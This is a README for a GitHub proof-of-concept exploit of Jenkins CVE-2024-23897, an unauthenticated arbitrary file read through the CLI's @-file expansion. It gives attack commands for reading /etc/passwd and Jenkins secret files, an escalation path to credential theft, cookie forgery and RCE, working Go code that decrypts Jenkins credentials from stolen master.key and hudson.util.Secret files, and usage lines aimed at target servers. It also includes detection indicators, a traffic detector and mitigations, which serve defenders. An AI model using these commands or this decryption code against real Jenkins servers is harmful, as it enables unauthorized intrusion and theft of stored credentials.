vmc8ll/poc-CVE-2024-23897
GitHub: vmc8ll/poc-CVE-2024-23897
A Jenkins CVE-2024-23897 PoC tool written in Go: it uses the CLI interface to read arbitrary files and supports the follow-on RCE attack chain.
Stars: 0 | Forks: 0
# POC-CVE-2024-23897
CVE-2024-23897: Jenkins arbitrary file read leading to RCE
🎯 Affected products and versions
```
Product: Jenkins (Continuous Integration/Continuous Delivery server)
Versions: Jenkins 2.441 and earlier, Jenkins LTS 2.426.2 and earlier
Fixed in: Jenkins 2.442, Jenkins LTS 2.426.3
```
📝 Description
CVE-2024-23897 is a critical vulnerability in Jenkins that lets unauthenticated attackers read arbitrary files on the Jenkins controller's file system. It exists because Jenkins did not disable a feature of the args4j command parser it uses for CLI commands: an argument consisting of an '@' character followed by a file path is replaced with the contents of that file.
Combined with other techniques this flaw can lead to remote code execution (RCE), which puts organizations that run Jenkins at the heart of their CI/CD pipelines at particular risk.
🔍 Vulnerability details
Root cause
The vulnerability originates in the `expandAtFiles()` method of the `org.kohsuke.args4j.CmdLineParser` class. While parsing CLI arguments, whenever the parser encounters an '@' followed by a file path it reads that file and splices its contents into the argument list, one argument per line.
Attack vector
An attacker can trigger this through the Jenkins CLI interface without any authentication:
```bash
java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ help @/etc/passwd
```
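The expansion described above, modelled in Go as an added example (this is not code from this repository, from Jenkins or from args4j). `expandAtFiles` mirrors args4j's behaviour of replacing an `@path` argument with that file's lines, one argument per line, and the `atSyntax` flag stands for the `ParserProperties.withAtSyntax(false)` setting the fix uses. The passwd file is a constructed sample written to a temporary directory, not a real system file.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// expandAtFiles models args4j's CmdLineParser.expandAtFiles(): while atSyntax
// is enabled, every argument beginning with '@' is treated as a response file
// and replaced by that file's lines, one argument per line. Jenkins 2.441 /
// LTS 2.426.2 and earlier left this enabled for CLI commands; the fix builds
// the parser with ParserProperties.withAtSyntax(false), which is the
// atSyntax=false path here, so the argument passes through literally.
func expandAtFiles(args []string, atSyntax bool) ([]string, error) {
	var out []string
	for _, arg := range args {
		if !atSyntax || !strings.HasPrefix(arg, "@") {
			out = append(out, arg)
			continue
		}
		f, err := os.Open(arg[1:]) // the attacker controls this path
		if err != nil {
			return nil, fmt.Errorf("no such file: %s", arg[1:])
		}
		sc := bufio.NewScanner(f)
		for sc.Scan() {
			out = append(out, sc.Text())
		}
		f.Close()
		if err := sc.Err(); err != nil {
			return nil, err
		}
	}
	return out, nil
}

// writeSample writes a constructed stand-in for /etc/passwd into dir and
// returns its path (sample data, not a real system file).
func writeSample(dir string) (string, error) {
	p := filepath.Join(dir, "passwd")
	data := "root:x:0:0:root:/root:/bin/bash\n" +
		"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n" +
		"jenkins:x:1000:1000::/var/jenkins_home:/bin/bash\n"
	return p, os.WriteFile(p, []byte(data), 0o600)
}

// demo runs the same CLI argument vector through both parser configurations
// and returns the resulting argv for each.
func demo() (vulnerable, fixed []string, err error) {
	dir, err := os.MkdirTemp("", "atfile")
	if err != nil {
		return nil, nil, err
	}
	defer os.RemoveAll(dir)
	p, err := writeSample(dir)
	if err != nil {
		return nil, nil, err
	}
	argv := []string{"help", "@" + p} // what `jenkins-cli help @<path>` sends
	if vulnerable, err = expandAtFiles(argv, true); err != nil {
		return nil, nil, err
	}
	if fixed, err = expandAtFiles(argv, false); err != nil {
		return nil, nil, err
	}
	return vulnerable, fixed, nil
}

func main() {
	v, f, err := demo()
	if err != nil {
		fmt.Println("error:", err)
		os.Exit(1)
	}
	fmt.Printf("vulnerable (atSyntax=true):  %q\n", v)
	fmt.Printf("fixed      (atSyntax=false): %q\n", f)
}
```

With the vulnerable configuration the `help` command receives `root:x:0:0:root:/root:/bin/bash` as its command-name argument and rejects it in its error output, which is the one line an unauthenticated caller gets back; commands that echo more of their arguments leak a few more lines, which is the command-dependent limit described under "File read limits".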
Technical analysis
File read limits
```
Without Overall/Read permission: only the first few lines of a file can be read (roughly 3; the exact number depends on which CLI command echoes its arguments in error messages)
With Overall/Read permission: entire files can be read
Binary files: can be extracted but are subject to charset conversion on the controller (Windows-1252 on Windows yields better results than UTF-8 on Linux)
```
Escalation paths
Once file read is achieved, an attacker can escalate to more serious attacks:
```
Extract credentials:
Read /var/jenkins_home/credentials.xml for the encrypted {...} secrets
Read /var/jenkins_home/secrets/master.key and /var/jenkins_home/secrets/hudson.util.Secret, the two key files needed to decrypt them
Decrypt offline with those two files, or, if script console access is already available, with println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
Forge "remember-me" cookies:
Obtain administrative access by forging the remember-me authentication cookie
Execute arbitrary code:
Achieve RCE through Resource Root URL, stored XSS, or CSRF vectors
```
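The offline decryption step, as an added Go example that is not part of this repository. It implements the format Jenkins' `hudson.util.Secret` and its confidential store use: the trimmed `master.key` text is hashed with SHA-256 and truncated to 16 bytes; `secrets/hudson.util.Secret` is AES-128-ECB of 256 random bytes plus the `::::MAGIC::::` marker under that key; each `{...}` value is base64 of `0x01`, big-endian IV and data lengths, the IV, and AES-128-CBC ciphertext under the first 16 bytes of the decrypted key file. The master.key text, key material and encrypted value are constructed inside the block in that layout, so nothing real is touched; against a target you would instead pass the two files and the value read through the vulnerability.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

const magic = "::::MAGIC::::" // marker Jenkins appends to key material before encrypting it

// aes128Key is Jenkins' Util.toAes128Key: SHA-256 of the trimmed master.key text, first 16 bytes.
func aes128Key(masterKeyText string) []byte {
	sum := sha256.Sum256([]byte(strings.TrimSpace(masterKeyText)))
	return sum[:16]
}

func pkcs7Pad(b []byte) []byte {
	p := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(p)}, p)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 || b[len(b)-1] == 0 || int(b[len(b)-1]) > aes.BlockSize {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return b[:len(b)-int(b[len(b)-1])], nil
}

// ecb applies fn (block.Encrypt or block.Decrypt) block by block: Java's plain "AES" is AES/ECB/PKCS5Padding.
func ecb(fn func(dst, src []byte), in []byte) []byte {
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += aes.BlockSize {
		fn(out[i:], in[i:])
	}
	return out
}

// hudsonSecretKey decrypts secrets/hudson.util.Secret with master.key; the plaintext is
// <256 random bytes>::::MAGIC:::: and its first 16 bytes are the key behind every {...} secret.
func hudsonSecretKey(masterKeyText string, hudsonSecretFile []byte) ([]byte, error) {
	block, _ := aes.NewCipher(aes128Key(masterKeyText)) // 16-byte key, cannot fail
	if len(hudsonSecretFile)%aes.BlockSize != 0 {
		return nil, errors.New("hudson.util.Secret: not block aligned")
	}
	plain, err := pkcs7Unpad(ecb(block.Decrypt, hudsonSecretFile))
	if err != nil || !bytes.HasSuffix(plain, []byte(magic)) {
		return nil, errors.New("hudson.util.Secret: wrong master.key (MAGIC marker missing)")
	}
	return plain[:16], nil
}

// decryptSecret decrypts a "{base64}" value in the current v1 layout: 0x01 | int32 ivLen | int32 dataLen |
// iv | AES-128-CBC ciphertext (big-endian ints). The older AES-ECB layout with MAGIC appended is not handled.
func decryptSecret(key []byte, value string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.Trim(value, "{}"))
	if err != nil || len(raw) < 9 || raw[0] != 1 {
		return "", errors.New("not a base64 v1 payload")
	}
	ivLen, dataLen := int(binary.BigEndian.Uint32(raw[1:5])), int(binary.BigEndian.Uint32(raw[5:9]))
	block, err := aes.NewCipher(key)
	if err != nil || ivLen != aes.BlockSize || dataLen%aes.BlockSize != 0 || len(raw) != 9+ivLen+dataLen {
		return "", errors.New("malformed v1 payload or bad key")
	}
	out := make([]byte, dataLen)
	cipher.NewCBCDecrypter(block, raw[9:9+ivLen]).CryptBlocks(out, raw[9+ivLen:])
	plain, err := pkcs7Unpad(out)
	return string(plain), err
}

// fixture builds the three artefacts an attacker reads off disk, laid out the way Jenkins
// writes them. Constructed test data, not material from a real instance.
func fixture(plaintext string) (masterKeyText string, hudsonSecretFile []byte, encrypted string) {
	masterKeyText = "constructed-master-key\n" // real files hold 512 hex chars; only the text's hash matters
	payload, iv := make([]byte, 256), make([]byte, aes.BlockSize)
	rand.Read(payload) // crypto/rand failures are irrecoverable; Go 1.24 documents Read never returns an error
	rand.Read(iv)
	mb, _ := aes.NewCipher(aes128Key(masterKeyText))
	hudsonSecretFile = ecb(mb.Encrypt, pkcs7Pad(append(payload, magic...)))
	sb, _ := aes.NewCipher(payload[:16])
	data := pkcs7Pad([]byte(plaintext))
	cipher.NewCBCEncrypter(sb, iv).CryptBlocks(data, data)
	hdr := binary.BigEndian.AppendUint32([]byte{1}, aes.BlockSize) // 0x01, ivLen
	hdr = binary.BigEndian.AppendUint32(hdr, uint32(len(data)))    // dataLen
	encrypted = "{" + base64.StdEncoding.EncodeToString(append(append(hdr, iv...), data...)) + "}"
	return
}

func main() {
	mk, hs, enc := fixture("s3cr3t-deploy-token")
	key, err := hudsonSecretKey(mk, hs)
	plain, err2 := decryptSecret(key, enc)
	fmt.Printf("%s -> %q (errors: %v, %v)\n", enc, plain, err, err2)
}
```

The MAGIC check is what tells you whether the `master.key` you recovered belongs to the `hudson.util.Secret` you recovered: with the wrong key file the ECB output is random and the marker is absent, so the function refuses rather than handing back garbage key material.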
💥 Impact
Direct impact
```
Confidentiality: disclosure of any file readable by the Jenkins controller process, subject to the read limits above (source code, credentials.xml, master.key and hudson.util.Secret, SSH keys, API tokens)
Integrity: after escalating to administrative access, attackers can modify builds, pipelines, and configuration
Availability: potential denial of service or ransomware deployment
```
Real-world exploitation
This vulnerability has been actively exploited in the wild:
```
Added to CISA Known Exploited Vulnerabilities (KEV) catalog
Used by ransomware gangs (RansomEXX) to compromise infrastructure
Exploited by threat actor IntelBroker to steal GitHub repositories and compromise IT service providers
```
🔧 Detection
Indicators of compromise
Exploitation attempts can be detected through:
HTTP request pattern:
```text
POST /cli?remoting=false HTTP/1.1
Session: <session id shared by the upload and download halves>
Side: upload
Content-type: application/octet-stream
[binary payload containing @/path/to/file]
```
Typical payload examples:
```
@/etc/passwd
@/var/jenkins_home/secrets/initialAdminPassword
@/etc/os-release
```
Splunk detection query
```text
index=web uri="*/cli?remoting=false*" http_method=POST http_status=200
```
This query flags every HTTP-mode CLI session, including legitimate jenkins-cli.jar use, so baseline it against known CLI clients and confirm hits by inspecting the upload body for @-prefixed paths; CLI traffic over the WebSocket transport (/cli/ws) does not match it at all.
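An added Go example of the body-level check the indicators above call for (not part of this repository). It parses a raw HTTP request, keeps only the `Side: upload` half of a `/cli?remoting=false` session, and extracts `@`-prefixed absolute POSIX or Windows paths from the body. The sample requests, the session id and the ARG frame layout are constructed for the example; the frame layout is an approximation of the CLI's binary framing and the detector does not depend on it, only on the ASCII path the framing carries.

```go
package main

import (
	"bufio"
	"bytes"
	"encoding/binary"
	"fmt"
	"io"
	"net/http"
	"regexp"
)

// atPath matches an args4j-style @file reference with an absolute POSIX or
// Windows path; the CLI encodes arguments as plain ASCII inside its binary
// frames, so the path survives as a readable substring of the request body.
var atPath = regexp.MustCompile(`@(?:/|[A-Za-z]:[\\/])[\x21-\x7e]+`)

type finding struct {
	Session string   // CLI Session header, ties the upload to its download half
	Paths   []string // every @path reference found in the upload body
}

// inspect parses one raw HTTP request. Only the upload half of a
// /cli?remoting=false session carries the command line, so the download half
// and every unrelated request return (nil, nil).
func inspect(raw []byte) (*finding, error) {
	req, err := http.ReadRequest(bufio.NewReader(bytes.NewReader(raw)))
	if err != nil {
		return nil, err
	}
	if req.Method != http.MethodPost || req.URL.Path != "/cli" ||
		req.URL.Query().Get("remoting") != "false" || req.Header.Get("Side") != "upload" {
		return nil, nil
	}
	body, err := io.ReadAll(req.Body)
	if err != nil {
		return nil, err
	}
	paths := atPath.FindAllString(string(body), -1)
	if len(paths) == 0 {
		return nil, nil
	}
	return &finding{Session: req.Header.Get("Session"), Paths: paths}, nil
}

// argFrame approximates one CLI ARG frame (assumption: big-endian frame
// length, op byte 0x00, then a Java writeUTF string). inspect does not rely
// on this layout; it only needs the ASCII path embedded in it.
func argFrame(s string) []byte {
	f := make([]byte, 7+len(s))
	binary.BigEndian.PutUint32(f[0:], uint32(3+len(s)))
	binary.BigEndian.PutUint16(f[5:], uint16(len(s)))
	copy(f[7:], s)
	return f
}

// cliRequest builds a constructed request the way the jenkins-cli HTTP
// transport sends it (Session and Side headers on a POST to
// /cli?remoting=false). Content-Length stands in for the client's chunked
// encoding so the sample stays a single byte string.
func cliRequest(side, session string, body []byte) []byte {
	var b bytes.Buffer
	fmt.Fprintf(&b, "POST /cli?remoting=false HTTP/1.1\r\nHost: jenkins.internal:8080\r\n"+
		"Session: %s\r\nSide: %s\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n",
		session, side, len(body))
	b.Write(body)
	return b.Bytes()
}

// samples returns constructed traffic: two exploit uploads, the matching
// download half (no body), and a legitimate who-am-i CLI call.
func samples() map[string][]byte {
	s := "4f1e2d3c-0000-4000-8000-000000000001" // constructed session id
	return map[string][]byte{
		"exploit-linux":   cliRequest("upload", s, append(argFrame("help"), argFrame("@/etc/passwd")...)),
		"exploit-windows": cliRequest("upload", s, append(argFrame("help"), argFrame("@C:/Windows/win.ini")...)),
		"download-half":   cliRequest("download", s, nil),
		"benign":          cliRequest("upload", s, argFrame("who-am-i")),
	}
}

func main() {
	for name, raw := range samples() {
		f, err := inspect(raw)
		if err != nil || f == nil {
			fmt.Printf("%-16s no alert (err=%v)\n", name, err)
			continue
		}
		fmt.Printf("%-16s ALERT session=%s paths=%v\n", name, f.Session, f.Paths)
	}
}
```

Because the path is matched inside the upload body rather than on the URL, this check does not fire on ordinary CLI sessions the way the Splunk query does, and the Session value lets you pull the download half of the same session from the capture to see what the server returned.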
🛡️ Mitigation
Official fix
Upgrade to a fixed version:
```
Jenkins ≥ 2.442
Jenkins LTS ≥ 2.426.3
```
Temporary mitigation
If you cannot patch immediately:
```
Disable Jenkins CLI access (the advisory's recommended workaround; the Jenkins documentation provides a Groovy init script for it)
Restrict network access to the Jenkins controller
WAF rules that block CLI upload bodies containing @/ (or @C:) reduce exposure but do not cover the WebSocket CLI transport (/cli/ws)
Note: hudson.cli.CLICommand.allowAtSyntax is a Java system property introduced by the fix; it defaults to false in fixed versions and setting it to true re-enables the vulnerable @-file expansion, so it is not a workaround for unpatched versions
```
🔗 References
```
NVD Entry
Jenkins Security Advisory
CISA KEV Catalog
Splunk Research
Tenable CVE Page
```
📦 Building and Running
```bash
# Build the exploit
go build -o jenkins-cve-2024-23897 exploit.go
# Run the built binary
./jenkins-cve-2024-23897 http://target-jenkins:8080 /etc/passwd
# Or run directly with Go
go run exploit.go http://target-jenkins:8080 /etc/passwd
```
🎯 Usage examples
```bash
# Read sensitive files
./jenkins-cve-2024-23897 http://jenkins.internal:8080 /etc/passwd
./jenkins-cve-2024-23897 http://localhost:8080 /var/jenkins_home/secrets/initialAdminPassword
# Read Windows files (if Jenkins runs on Windows)
./jenkins-cve-2024-23897 http://win-jenkins:8080 C:/Windows/win.ini
```
⚙️ How it works
```
Session Initialization: Generates a unique 20-byte session ID
Payload Construction: Builds binary payload with help @/path/to/file structure
Upload Phase: Sends payload to Jenkins CLI endpoint
Download Phase: Retrieves file content from the response
Output: Displays the file content or error message
```
📊 Features
```
Pure Go implementation - No external dependencies
Cross-platform - Works on Windows, Linux, macOS
Configurable timeouts - Adjustable for slow networks
Clean error handling - Detailed error messages
Binary-safe - Handles both text and binary files
```
⚠️ Important notes
```
Educational purposes only - use only on systems you own or are authorized to test
Unauthenticated reads - without Overall/Read permission only the first few lines (roughly 3, command-dependent) are readable
Binary files - subject to charset conversion on the controller; Windows targets (Windows-1252) extract binary content more reliably than Linux targets (UTF-8)
```